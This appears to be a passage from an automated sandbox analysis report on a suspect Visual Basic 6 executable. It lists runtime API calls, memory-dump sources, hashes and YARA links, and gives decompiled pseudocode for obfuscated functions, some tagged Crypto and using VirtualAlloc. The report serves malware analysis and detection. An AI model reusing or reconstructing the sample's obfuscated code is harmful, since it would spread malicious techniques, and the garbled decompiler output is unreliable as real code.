__vbaStrMove.MSVBVM60(00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 00410495
__vbaI4Str.MSVBVM60(00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 0041049B
#698.MSVBVM60(?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 004104A5
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 004104C9
__vbaFreeStr.MSVBVM60(00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 004104D8
__vbaFreeVar.MSVBVM60(00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 004104E0
#685.MSVBVM60(00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 004104F4
__vbaObjSet.MSVBVM60(?,00000000,00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0), ref: 004104FE
__vbaNew2.MSVBVM60(00401DE0,00413010,?,00000000,00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0), ref: 00410554
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041058D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000098), ref: 004105DA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E94,00000044), ref: 0041063B
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00410659
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,00401346), ref: 00410673
__vbaNew2.MSVBVM60(00401DE0,00413010,00008008,?,?,00000000,00000000,00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0), ref: 0041068E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004106C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,0000022C), ref: 0041070D
__vbaFreeObj.MSVBVM60(00000000,?,00403AA8,0000022C), ref: 00410724
#591.MSVBVM60(00000005), ref: 0041073D
__vbaStrMove.MSVBVM60(00000005), ref: 00410747
__vbaStrCat.MSVBVM60(004041C8,Doub,00000000,00000005), ref: 00410757
__vbaStrMove.MSVBVM60(004041C8,Doub,00000000,00000005), ref: 00410761
__vbaStrCat.MSVBVM60(004041D0,00000000,004041C8,Doub,00000000,00000005), ref: 0041076C
__vbaStrMove.MSVBVM60(004041D0,00000000,004041C8,Doub,00000000,00000005), ref: 00410776
__vbaStrCmp.MSVBVM60(00000000,004041D0,00000000,004041C8,Doub,00000000,00000005), ref: 0041077C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,004041D0,00000000,004041C8,Doub,00000000,00000005), ref: 0041079E
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00401346), ref: 004107A9
__vbaVarDup.MSVBVM60 ref: 00410800
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 00410817
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0041082E
#534.MSVBVM60(?,?,?,?,?,?,?,00401346), ref: 00410836
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,?,?,?,?,?,00401346), ref: 0041084E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410887
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000168), ref: 004108D4
__vbaFreeObj.MSVBVM60(00000000,?,00403AA8,00000168), ref: 004108F6
__vbaFreeStr.MSVBVM60(00410963), ref: 0041094D
__vbaFreeObj.MSVBVM60(00410963), ref: 00410955
__vbaFreeStr.MSVBVM60(00410963), ref: 0041095D

Strings

Doub, xrefs: 0041074D
Fraela, xrefs: 004107E3

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ListMoveNew2$#595Chkstk$#534#562#591#618#660#685#698Copy
String ID: Doub$Fraela
API String ID: 1906061798-1520045753
Opcode ID: 1259ba1b97f2a50d3de7208dea8c164ca533f92afe3619f0273452a2595918fb
Instruction ID: 0d7b2cc3e162a9ac14b24511d68454faeb90e136b5fbb8e267c0565b5076d564
Opcode Fuzzy Hash: 1259ba1b97f2a50d3de7208dea8c164ca533f92afe3619f0273452a2595918fb
Instruction Fuzzy Hash: 3A52D971D01218AFDB21EF91CC45FDDB7B8BF08305F1041AAE10ABB1A1DB795A858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00408258, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

"1, xrefs: 004082EC

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "1
API String ID: 0-3082114277
Opcode ID: 6182c92da6daa85a808e9cb733e634688e08f0af63b97ea96de45812cf101b8d
Instruction ID: 4ca734709ead4ad45e0ef577c4cc7821ab9d5802b0331914c2258ade10f70a4c
Opcode Fuzzy Hash: 6182c92da6daa85a808e9cb733e634688e08f0af63b97ea96de45812cf101b8d
Instruction Fuzzy Hash: 25813563F0971285FF722068CAD45AD6513DBC2300F37863BCDAA379C59A3E0ACA5247

Uniqueness

Uniqueness Score: -1.00%

Function 00408409, Relevance: 1.5, APIs: 1, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6e428dd2c67f5cb7d586a808cd30fbcbc396205c67b1ef3eaa3a645c07278c
Instruction ID: 336c4562b78d7d69f52b4ec5d10f4bded96a920418486ba8f56d7321769ac90f
Opcode Fuzzy Hash: 2e6e428dd2c67f5cb7d586a808cd30fbcbc396205c67b1ef3eaa3a645c07278c
Instruction Fuzzy Hash: 6C911162E0875285FF321128CED066E2612DBD2301F36867FCDE9769C59E7F09C6528B

Uniqueness

Uniqueness Score: -1.00%

Function 0040830D, Relevance: 1.5, APIs: 1, Instructions: 243memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2f2d9764b535512b0a4f728e285b46a478f926147f0239b783278e9dab1b8da
Instruction ID: b3c6d6ff0017573521b300bcd7b9769962bd54987e16a4508b9543dc2179b6f9
Opcode Fuzzy Hash: a2f2d9764b535512b0a4f728e285b46a478f926147f0239b783278e9dab1b8da
Instruction Fuzzy Hash: F271DF63F1971285FF722028CAD45AD5413DBC2340F37863BCDAA339D99A3E4ACA5247

Uniqueness

Uniqueness Score: -1.00%

Function 004083B2, Relevance: 1.5, APIs: 1, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ed670e775963164016e45e0e2d611f736f84924904812721bee445046303a1
Instruction ID: 4171745faa571c38c4a3d20703257830dc71851e40d90fad510ccf2fb5fe9d0d
Opcode Fuzzy Hash: 29ed670e775963164016e45e0e2d611f736f84924904812721bee445046303a1
Instruction Fuzzy Hash: 1471E263F1971285FF721128CAD066E1513DBD2305F36863BCDEA729C59A3F09C6528B

Uniqueness

Uniqueness Score: -1.00%

Function 00408499, Relevance: 1.4, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b0b4a4811a09adaee57b5ed99773cbad965a0a6e6529258ac39945d1949bbd
Instruction ID: b45a2cc249b52cb92112b33ffd392cf3c9a6eb29b3acc9c098789b6058e84f0e
Opcode Fuzzy Hash: e4b0b4a4811a09adaee57b5ed99773cbad965a0a6e6529258ac39945d1949bbd
Instruction Fuzzy Hash: 7C51AE63F1972281FF722028CAD05AD5013DBC2351F36863BCDAA33DD55A3E4ACA6247

Uniqueness

Uniqueness Score: -1.00%

Function 00408632, Relevance: 1.4, APIs: 1, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fc13fedfe6435b72957c89a444d7ca078d9be1bd5a51a510be20b262d445d8f4
Instruction ID: 1bd93d56e31f175b6246aa10da27d70d03c0593736607557d4d1a3c0086b8053
Opcode Fuzzy Hash: fc13fedfe6435b72957c89a444d7ca078d9be1bd5a51a510be20b262d445d8f4
Instruction Fuzzy Hash: 6D41C063F1971241FF722028CAD05BD5413DBC2315F36863BC9AE338D55A3E49CA625B

Uniqueness

Uniqueness Score: -1.00%

Function 00408591, Relevance: 1.4, APIs: 1, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93726070a218059b12821952a7b92196d8eb957cad3b9bc665fafab71b0e8342
Instruction ID: 3c940ca6c63dc80d523c33086fd0a951d63b9eaf0ad7e231be31865c66122c17
Opcode Fuzzy Hash: 93726070a218059b12821952a7b92196d8eb957cad3b9bc665fafab71b0e8342
Instruction Fuzzy Hash: 20419D63F1971245FF722028CAD05AD5413DBC2311F36863BC9AE338D55A3E4ACA625B

Uniqueness

Uniqueness Score: -1.00%

Function 004085E3, Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8d7dafed719c261d63de68f95e7aa2c27813e587eb370e26f167bf740f6bff11
Instruction ID: 5f086426dedac3bdbaf097f74f130079d738ef17e6c33e2462dd39ca2d655b9c
Opcode Fuzzy Hash: 8d7dafed719c261d63de68f95e7aa2c27813e587eb370e26f167bf740f6bff11
Instruction Fuzzy Hash: 0F41AE63F1971241FF722028CAD49AD5423DBC2315F36873BC9AE338D55A3E49CA625B

Uniqueness

Uniqueness Score: -1.00%

Function 00408689, Relevance: 1.4, APIs: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3a941c6361457553b6f310114017db46da6dede651fc1ed6728ffa11c2458bf5
Instruction ID: 40cf2962bb0cb834041750851574504017e4908df2ac8b8c451c8b5e2e3c1f6b
Opcode Fuzzy Hash: 3a941c6361457553b6f310114017db46da6dede651fc1ed6728ffa11c2458bf5
Instruction Fuzzy Hash: 3D318D63F1971241FF712018CAD09BD5513DBC2311F72863BCAAA23CE59B3E49C6625B

Uniqueness

Uniqueness Score: -1.00%

Function 004086D8, Relevance: 1.3, APIs: 1, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2d567f6a02734ea3a3a52c3ac466ed1499f0642a637d217762390b9961178f28
Instruction ID: b883a8b178e5d738a84858df992f3b0f0abebac3c8acf5dac50984cdc3775e4b
Opcode Fuzzy Hash: 2d567f6a02734ea3a3a52c3ac466ed1499f0642a637d217762390b9961178f28
Instruction Fuzzy Hash: E521BF63F1A72245FF712428CAD057D6512DB82310F32863BCEAA239E59A3E05C6624B

Uniqueness

Uniqueness Score: -1.00%

Function 00408776, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 257a84c478bc35a6110c46aa9a80bb10b3d44a2d6f98d3ff8be5268d93a07875
Instruction ID: 80585b81794ab4641c3d407fad3366f0360f04a8a6ce56f7d97d30d0545440da
Opcode Fuzzy Hash: 257a84c478bc35a6110c46aa9a80bb10b3d44a2d6f98d3ff8be5268d93a07875
Instruction Fuzzy Hash: 7711DD92F1971241FF722068CAE057C5412CB82311F66823FCE9A32CE59A3E49CAA247

Uniqueness

Uniqueness Score: -1.00%

Function 0040872B, Relevance: 1.3, APIs: 1, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(FFFFFFFE,00008000,-00000ECA,00000019), ref: 004087AF

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b0770f540ba1a6ef20decc70fc09d37fe19ba3cb9eb34aa6db6adfcaf6962be8
Instruction ID: 066fd46d774d999300f204fbfab5c60447cfb7ab8896c82a77fbcfc5e1c189fd
Opcode Fuzzy Hash: b0770f540ba1a6ef20decc70fc09d37fe19ba3cb9eb34aa6db6adfcaf6962be8
Instruction Fuzzy Hash: 5F21D653F0DB1141FF712168C9D05ADA522DFC2301F66C63BCEDA279D59A3E09C6A247

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405950, Relevance: .1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E00405950(signed int __eax, intOrPtr __ebx, signed int __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
				signed char _t46;
				signed int _t49;
				void* _t62;
				signed int _t75;
				void* _t79;
				void* _t80;
				signed int _t81;

				es =  *((intOrPtr*)(_t81 + 7 + __ecx * 8));
				 *[fs:eax+0x14d2cefe] = __ebx;
				asm("clc");
				asm("adc esp, [ebp-0x24]");
				asm("sbb [esi+0x41], ecx");
				_t75 = __esi - 1;
				 *__edi =  *__edi + __ecx + 1 -  *[fs:eax+0x14d2cefe];
				 *(__edx + 0x49) = __eax ^ 0x75;
				asm("adc esp, edi");
				asm("lock mov eax, [0x85b79d42]");
				asm("enter 0x2dc, 0xfa");
				asm("invalid");
				asm("insd");
				asm("enter 0x2cc, 0x6a");
				asm("enter 0x2cc, 0x66");
				asm("clc");
				asm("adc esp, [ebp-0x4f]");
				asm("aad 0x8e");
				asm("popfd");
				asm("adc eax, [edi]");
				asm("o16 jns 0xffcd");
				asm("int1");
				asm("adc dword [esi], 0xffffff8c");
				asm("std");
				 *0xb1276e72 =  *0xb1276e72 ^ _t75;
				asm("aad 0x8e");
				asm("a16 xor eax, 0xf5b76607");
				asm("rcr dword [esi-0x75], cl");
				asm("adc [edi+eax], edi");
				asm("o16 jns 0xfff1");
				asm("o16 test al, 0xff");
				asm("das");
				_t62 = fs + 2;
				asm("outsb");
				fs =  *((intOrPtr*)(( *0x91616bda +  *0x91616bda | 0xe4c400d4) + 0xe1 + (( *0x91616bda +  *0x91616bda | 0xe4c400d4) + 0xe1) * 2));
				if(_t62 < 0) {
					_pop(es);
					_t49 = 0xffffffff98ccedff *  *0xcac14672;
					_t14 = _t75;
					_t75 =  *_t49;
					 *_t49 = _t14;
					 *(_t75 - 0x3e) =  *(_t75 - 0x3e) | _t81;
					asm("int 0x7");
					asm("adc esi, [edi-0x7ca0314f]");
					_push(_t49);
					asm("cmpsb");
					_push(_t75);
					_t62 = _t62 + 2;
					asm("jecxz 0xffffff9c");
					asm("repe inc edi");
					asm("outsb");
				}
				asm("o16 jns 0xfff8");
				 *_t75 = fs;
				_t80 = _t79 - 1;
				_pop(ss);
				_t64 = _t62 + 2;
				if(_t64 != 0) {
					L4:
					_t64 = _t64 + 1;
					asm("movsb");
					asm("insd");
				}
				_pop(es);
				 *0xcb57d6ac = _t64;
				es =  *0x000000F4;
				asm("adc eax, [edi]");
				asm("invalid");
				_pop(_t75);
				_pop(es);
				_t46 =  *0xcb57d6ac ^ 0x00000007 | 0x00000050;
				_t64 = 0xd5;
				if(_t46 >= 0) {
					goto L4;
				}
				asm("clc");
				 *0x0000010A =  *0x0000010A << 0xd5;
				_pop(es);
				asm("o16 mov bh, 0xf2");
				asm("lodsd");
				ds =  *((intOrPtr*)(_t80 + 0x13));
				_pop(es);
				asm("o16 daa");
				return _t46;
			}

0x00405952
0x00405958
0x00405961
0x00405962
0x00405965
0x0040596e
0x0040596f
0x00405971
0x00405976
0x0040597d
0x00405983
0x0040598a
0x0040598d
0x0040598e
0x00405996
0x004059a1
0x004059a2
0x004059a5
0x004059a7
0x004059a8
0x004059aa
0x004059ad
0x004059b3
0x004059b8
0x004059bb
0x004059c1
0x004059c3
0x004059c9
0x004059d3
0x004059d6
0x004059de
0x004059e1
0x004059e2
0x004059e4
0x004059e5
0x004059ea
0x004059f1
0x004059f9
0x004059fb
0x004059fb
0x004059fb
0x004059fd
0x00405a00
0x00405a02
0x00405a08
0x00405a09
0x00405a0a
0x00405a0b
0x00405a0e
0x00405a10
0x00405a12
0x00405a12
0x00405a16
0x00405a19
0x00405a1b
0x00405a21
0x00405a22
0x00405a24
0x00405a27
0x00405a27
0x00405a28
0x00405a29
0x00405a2a
0x00405a35
0x00405a37
0x00405a42
0x00405a44
0x00405a46
0x00405a54
0x00405a55
0x00405a56
0x00405a58
0x00405a5a
0x00000000
0x00000000
0x00405a5d
0x00405a5e
0x00405a61
0x00405a62
0x00405a65
0x00405a66
0x00405a69
0x00405a6a
0x00405a6c

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402b4241b06e1351dbda31bd54f2b42cd163048790a7acf3f23daec22ea986ff
Instruction ID: 69f206b3f7b5acec489b30c59ee3fc830e91d960207eaaa2859d3b78d14f7984
Opcode Fuzzy Hash: 402b4241b06e1351dbda31bd54f2b42cd163048790a7acf3f23daec22ea986ff
Instruction Fuzzy Hash: 10314576614B629FDB278F38D4406C6BBE1EB03B15369269EC5C29B302D3224513DBCA

Uniqueness

Uniqueness Score: -1.00%

Function 022E3BD9, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.686742043.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef80c78c9894ea724496fd022b270d238c145b936d45f227ee66d27367253c3
Instruction ID: 7503611b46ede522fea64c1a5cfec3e88b1ffe841ac12f610180ef81531c1fc4
Opcode Fuzzy Hash: 2ef80c78c9894ea724496fd022b270d238c145b936d45f227ee66d27367253c3
Instruction Fuzzy Hash: 2FF0F6D7058397B3CE0F99B4C1022E2A7D2FA1771D778F545C1974B213C205808BAB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00406351, Relevance: .0, Instructions: 40
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00406351(signed char __eax, void* __ecx, void* __edx, signed int __edi, void* __fp0) {
				signed char _t252;
				signed char _t257;
				void* _t398;
				void* _t419;
				void* _t426;
				void* _t510;
				signed int _t520;
				void* _t538;
				signed char _t584;
				void* _t663;

				_t663 = __fp0;
				_t520 = __edi;
				_t510 = __edx;
				_t419 = __ecx;
				_t252 = __eax;
				asm("invalid");
				_t398 = 0xfd;
				while(1) {
					asm("o16 xor al, 0xef");
					asm("invalid");
					asm("fsubr qword [esi]");
					_t257 = _t252 ^ 0xc4;
					_t426 = _t419 + 7;
					goto L2;
					_t8 = _t538 - 0x76c03d87;
					 *_t8 =  *(_t538 - 0x76c03d87) ^ 0x000000c5;
					_t584 =  *_t8;
					asm("loop 0xffffff82");
					 *(0x34b14e14 + _t520 * 8 - 0x7d088793) =  *(0x34b14e14 + _t520 * 8 - 0x7d088793) ^ 0x000000b6;
				}
			}

0x00406351
0x00406351
0x00406351
0x00406351
0x00406351
0x00406356
0x0040635c
0x0040635e
0x0040635e
0x00406361
0x00406368
0x0040637c
0x0040637e
0x0040637e
0x004063b9
0x004063b9
0x004063b9
0x004063b2
0x004063b3
0x004063b3

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31546a0a29ee9f7c6fef2ce3065c467a259ee415637a14e5972709646c505cc0
Instruction ID: cfefa5751e51c28163d10f8f6fe00d8d0180b7316916b915a27f04d1f4cf5a14
Opcode Fuzzy Hash: 31546a0a29ee9f7c6fef2ce3065c467a259ee415637a14e5972709646c505cc0
Instruction Fuzzy Hash: C2F0159304C65BFB8A1F9A32C0804C327E2FA4BB59339F458C8934B646D618800BBA87

Uniqueness

Uniqueness Score: -1.00%

Function 0041098C, Relevance: 119.5, APIs: 65, Strings: 3, Instructions: 497
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041098C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v40;
				void* _v44;
				char _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				char _v156;
				intOrPtr _v164;
				intOrPtr _v172;
				signed int _v176;
				signed int _v180;
				void* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				intOrPtr* _v232;
				signed int _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _t211;
				char* _t213;
				signed int _t215;
				signed int _t219;
				char* _t229;
				char* _t233;
				signed int _t237;
				char* _t241;
				signed int _t245;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t266;
				signed int _t272;
				signed int _t277;
				signed int _t281;
				signed int _t291;
				char* _t304;
				char* _t330;
				intOrPtr _t344;
				long long* _t345;
				signed int _t360;
				long long _t368;

				_push(0x401346);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t344;
				L00401340();
				_v12 = _t344;
				_v8 = 0x4012a8;
				L00401556();
				L00401556();
				_t211 =  &_v104;
				_push(_t211);
				L00401454();
				_t330 =  &_v104;
				_t304 =  &_v60;
				L004014A8();
				_push(0);
				_push(1);
				_push(2);
				L0040144E();
				if(_t211 != 0x102) {
					_t211 =  *((intOrPtr*)( *_a4 + 0x708))(_a4);
					_v176 = _t211;
					if(_v176 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x708);
						_push(0x402478);
						_push(_a4);
						_push(_v176);
						L0040158C();
						_v212 = _t211;
					}
				}
				_push(0x4041ec);
				L00401442();
				_push(_t330);
				_push(_t211);
				_t368 =  *0x401218;
				L00401448();
				if(_t211 != 0) {
					if( *0x413010 != 0) {
						_v216 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v216 = 0x413010;
					}
					_t277 =  &_v76;
					L00401598();
					_v176 = _t277;
					_t281 =  *((intOrPtr*)( *_v176 + 0xf0))(_v176,  &_v68, _t277,  *((intOrPtr*)( *((intOrPtr*)( *_v216)) + 0x304))( *_v216));
					asm("fclex");
					_v180 = _t281;
					if(_v180 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0xf0);
						_push(0x403aa8);
						_push(_v176);
						_push(_v180);
						L0040158C();
						_v220 = _t281;
					}
					if( *0x4134b0 != 0) {
						_v224 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v224 = 0x4134b0;
					}
					_v184 =  *_v224;
					_v204 = _v68;
					_v68 = _v68 & 0x00000000;
					_v96 = _v204;
					_v104 = 8;
					_v164 = 0x97;
					_v172 = 2;
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t291 =  *((intOrPtr*)( *_v184 + 0x38))(_v184, 0x10, 0x10,  &_v120);
					asm("fclex");
					_v188 = _t291;
					if(_v188 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x403ee0);
						_push(_v184);
						_push(_v188);
						L0040158C();
						_v228 = _t291;
					}
					_push( &_v120);
					_push( &_v156);
